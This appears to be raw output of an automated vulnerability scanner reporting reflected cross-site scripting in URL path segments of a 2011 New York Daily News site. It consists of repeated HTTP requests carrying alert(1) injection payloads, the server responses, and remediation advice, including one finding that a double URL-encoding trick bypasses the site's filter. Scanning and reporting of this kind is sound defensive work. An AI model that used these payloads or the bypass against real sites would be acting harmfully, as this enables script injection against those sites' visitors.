GET /ny_local/bronx/2011/021ce91'%3balert(1)//090f96c187c/08/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:39:16 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70184
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68e9c'%3balert(1)//85074386e76 was submitted in the REST URL parameter 5. This input was echoed as 68e9c';alert(1)//85074386e76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/0868e9c'%3balert(1)//85074386e76/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:03 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70184
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 986e4'%3balert(1)//65be1d34d1b was submitted in the REST URL parameter 6. This input was echoed as 986e4';alert(1)//65be1d34d1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/08/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html986e4'%3balert(1)//65be1d34d1b HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:04 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70184
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d697'%3balert(1)//f0c6371d739 was submitted in the REST URL parameter 1. This input was echoed as 1d697';alert(1)//f0c6371d739 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local1d697'%3balert(1)//f0c6371d739/bronx/2011/02/08/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:02 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70182
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40ff1'%3balert(1)//cf61dfa48aa was submitted in the REST URL parameter 2. This input was echoed as 40ff1';alert(1)//cf61dfa48aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx40ff1'%3balert(1)//cf61dfa48aa/2011/02/08/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:23 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70182
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f8ee'%3balert(1)//86d04fde49a was submitted in the REST URL parameter 3. This input was echoed as 4f8ee';alert(1)//86d04fde49a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/20114f8ee'%3balert(1)//86d04fde49a/02/08/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:38:15 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70182
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f8e1'%3balert(1)//48ba0a85a24 was submitted in the REST URL parameter 4. This input was echoed as 7f8e1';alert(1)//48ba0a85a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/027f8e1'%3balert(1)//48ba0a85a24/08/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:39:21 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70182
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e436'%3balert(1)//4d5ff5c698 was submitted in the REST URL parameter 5. This input was echoed as 9e436';alert(1)//4d5ff5c698 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/089e436'%3balert(1)//4d5ff5c698/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:09 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70181
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cebfe'%3balert(1)//645dba93430 was submitted in the REST URL parameter 6. This input was echoed as cebfe';alert(1)//645dba93430 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/08/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.htmlcebfe'%3balert(1)//645dba93430 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:00 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70182
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8788d'%3balert(1)//766c52f71a8 was submitted in the REST URL parameter 1. This input was echoed as 8788d';alert(1)//766c52f71a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local8788d'%3balert(1)//766c52f71a8/bronx/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:30 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70087
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bd6c'%3balert(1)//6328faa9069 was submitted in the REST URL parameter 2. This input was echoed as 6bd6c';alert(1)//6328faa9069 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx6bd6c'%3balert(1)//6328faa9069/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:47 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70087
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7bb6'%3balert(1)//c5a17b8b63a was submitted in the REST URL parameter 3. This input was echoed as c7bb6';alert(1)//c5a17b8b63a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/index.htmlc7bb6'%3balert(1)//c5a17b8b63a HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:09 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70087
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42da1'%3balert(1)//eccd8216a4d was submitted in the REST URL parameter 1. This input was echoed as 42da1';alert(1)//eccd8216a4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local42da1'%3balert(1)//eccd8216a4d/bronx/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:37:12 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41778 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 52670%250aalert%25281%2529%252f%252faa429ee7bb4 was submitted in the REST URL parameter 1. This input was echoed as 52670 alert(1)//aa429ee7bb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ny_local52670%250aalert%25281%2529%252f%252faa429ee7bb4/bronx/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:37:14 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41694 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b91e'%3balert(1)//0d3eac7e4b7 was submitted in the REST URL parameter 2. This input was echoed as 8b91e';alert(1)//0d3eac7e4b7 in the application's response.
